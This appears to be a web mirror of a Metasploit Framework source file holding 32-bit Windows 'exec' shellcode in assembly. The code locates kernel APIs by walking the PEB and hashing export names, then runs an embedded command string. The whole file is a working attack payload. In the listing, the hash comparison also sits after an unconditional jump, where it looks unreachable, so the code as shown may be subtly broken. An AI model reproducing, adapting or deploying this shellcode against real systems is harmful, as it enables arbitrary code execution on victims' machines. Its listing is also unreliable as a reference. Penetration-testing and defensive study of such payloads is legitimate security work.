CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/single_exec.asm
Views: 11779
1
;

2
; Metasploit Framework

3
; http://www.metasploit.com

4
;

5
; Source for exec (single)

6
;

7
; Authors: vlad902 <vlad902@gmail.com>

8
; Size   : 113

9
;

10


11
cld

12
call startup

13
mov eax,[ebp+0x3c]

14
mov edi,[ebp+eax+0x78]

15
add edi,ebp

16
mov ecx,[edi+0x18]

17
mov ebx,[edi+0x20]

18
add ebx,ebp

19
next_export:

20
dec ecx

21
mov esi,[ebx+ecx*4]

22
add esi,ebp

23
xor eax,eax

24
cdq

25
next_byte:

26
lodsb

27
test al,al

28
jz hash_complete

29
ror edx,0xd

30
add edx,eax

31
jmp short next_byte

32
cmp edx,[esp+0x4]

33
jnz next_export

34
hash_complete:

35
mov ebx,[edi+0x24]

36
add ebx,ebp

37
mov cx,[ebx+ecx*2]

38
mov ebx,[edi+0x1c]

39
add ebx,ebp

40
mov ebx,[ebx+ecx*4]

41
add ebx,ebp

42
mov [esp+0x4],ebx

43
ret

44
startup:

45
pop edi

46
xor esi,esi

47
pusha

48
push esi

49
mov eax,[fs:esi+0x30]

50
mov eax,[eax+0xc]

51
mov esi,[eax+0x1c]

52
lodsd

53
mov ebp,[eax+0x8]

54
mov eax,edi

55
add eax,byte +0x6a

56
push eax

57
push dword 0x5f048af0

58
push dword 0xe8afe98

59
push edi

60
jmp edi

61
db "command string"

62


63